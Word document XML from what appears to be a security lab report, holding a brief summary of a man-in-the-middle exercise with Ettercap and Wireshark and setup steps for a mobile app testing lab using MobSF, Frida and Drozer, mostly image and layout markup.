    <w:p w14:paraId="118F2637" w14:textId="714B2449" w:rsidR="00410B43" w:rsidRDefault="001D0D39" w:rsidP="00410B43">
      <w:r w:rsidRPr="00225402">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251717632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07B5BCEC" wp14:editId="6B8FADE3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>27802</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5736590" cy="645366"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:wrapNone/>
            <wp:docPr id="1238095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095120" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5736590" cy="645366"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB9CFA4" w14:textId="30BA2C88" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="625FA13D" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00225402" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="09B99920" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="30340CAF" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="57D767EB" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00933CF8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>50-Word Summary (MitM with Ettercap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBA941C" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="00933CF8" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:r w:rsidRPr="001D4D94">
        <w:t>Ettercap performs a Man-in-the-Middle attack using ARP spoofing to position the attacker between the victim and gateway. This allows interception and modification of network traffic. Captured data is analyzed using Wireshark, enabling visibility into protocols like HTTP and SMB, potentially exposing sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6722709E" w14:textId="77777777" w:rsidR="00EB6FBA" w:rsidRDefault="00EB6FBA" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="6A572BFA" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="39CEAD5C" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="7093AEF0" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="7A13B3DF" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="51F96823" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="3A187424" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="5DC47891" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="4E29229D" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="792D47FB" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="0B90869C" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="11F7AFB7" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="76D089C0" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="200CC087" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="30FC6A26" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="157FC0F0" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="2A11CB6B" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="5C85863F" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="76D348C7" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="550B0A20" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="74796AB7" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="702DBF11" w14:textId="77777777" w:rsidR="00624F6E" w:rsidRDefault="00624F6E" w:rsidP="00EB6FBA"/>
    <w:p w14:paraId="19EA28D1" w14:textId="4EEE08B5" w:rsidR="00624F6E" w:rsidRDefault="004E6DFE" w:rsidP="004E6DFE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc224731505"/>
      <w:r w:rsidRPr="004E6DFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mobile Application Testing Lab</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="60DFB0B7" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E05F75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251719680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F55527C" wp14:editId="6452229B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>285750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4985385" cy="706120"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="231448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48631" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4985385" cy="706120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00E05F75">
        <w:t>Make sure you have Mobile-Security-Framework-MobSF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008B44EF" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="79E0403D" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="2B0D65F0" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="1D0EFC2E" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="3EF99274" w14:textId="2CF264AC" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="3C0C7E48" w14:textId="147B5B43" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E05F75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251720704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75CE4A20" wp14:editId="3E05DCE9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>261316</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5732890" cy="722124"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1905"/>
            <wp:wrapNone/>
            <wp:docPr id="1957290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290237" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5732890" cy="722124"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00E05F75">
        <w:t>Go to the directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46555EAE" w14:textId="11AC27B1" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="541E20D6" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="0D41F612" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="39E892FA" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="22DE939A" w14:textId="2FD53BC5" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="4FD136F6" w14:textId="2262CDA9" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E05F75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251721728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="146B4645" wp14:editId="4D24DADE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>261593</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5605670" cy="718077"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapNone/>
            <wp:docPr id="681359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59181" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5605670" cy="718077"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00E05F75">
        <w:t>Execute the run.sh file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2836682A" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="4A46E335" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="1C873AD4" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="2D2E0056" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="30E3EADA" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="0AE890F0" w14:textId="2372AC69" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E05F75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251722752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="52182759" wp14:editId="74D8F12D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>265982</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5359179" cy="2421364"/>
            <wp:effectExtent l="19050" t="19050" r="13335" b="17145"/>
            <wp:wrapNone/>
            <wp:docPr id="1622397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97546" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5359179" cy="2421364"/>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Pr="00E05F75">
        <w:t>Access in browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170D0A53" w14:textId="6C2A079B" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="6A51E266" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="6267517F" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="30AE6B4D" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="2E572D9C" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="617D7BD5" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="26048321" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="16276048" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="4070082D" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="21698E8C" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="17190CC8" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="63D76F90" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="7FA57515" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="0989990C" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="7EC122EB" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E05F75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251723776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3D04CFCA" wp14:editId="309D2481">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>277219</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5406887" cy="778107"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3175"/>
            <wp:wrapNone/>
            <wp:docPr id="212615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15163" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5406887" cy="778107"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00E05F75">
        <w:t>Install Frida tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52658F1A" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="1D2FAA7F" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="48AC79A4" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="1BC36890" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="5A73E81E" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="322B6BB4" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="328F29F0" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="3948BCEC" w14:textId="02B7BDA6" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00E5073A" w:rsidP="00F900B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E05F75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251724800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="47326389" wp14:editId="35DEAD9C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>266368</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5446643" cy="1037539"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1642316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316885" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5465925" cy="1041212"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00F900B0" w:rsidRPr="00E05F75">
        <w:t>Install Drozer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36847051" w14:textId="194B8EF3" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="11D5B150" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="4E001464" w14:textId="77777777" w:rsidR="00F900B0" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="4A93AB8A" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="1669E95A" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="7784EEEC" w14:textId="77777777" w:rsidR="00E5073A" w:rsidRPr="00E05F75" w:rsidRDefault="00E5073A" w:rsidP="00F900B0"/>
    <w:p w14:paraId="741B215B" w14:textId="32262E99" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0"/>
    <w:p w14:paraId="4FDBA8E1" w14:textId="19E8854C" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E05F75">
        <w:t>Login to MobSF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA8D4A" w14:textId="65EEEC34" w:rsidR="00F900B0" w:rsidRPr="00E05F75" w:rsidRDefault="00F900B0" w:rsidP="00F900B0">
      <w:r w:rsidRPr="00E05F75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251725824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F29432C" wp14:editId="45716957">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4067175" cy="3689350"/>
            <wp:effectExtent l="0" t="0" r="9525" b="6350"/>
            <wp:wrapNone/>
            <wp:docPr id="1476047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047755" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId69">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
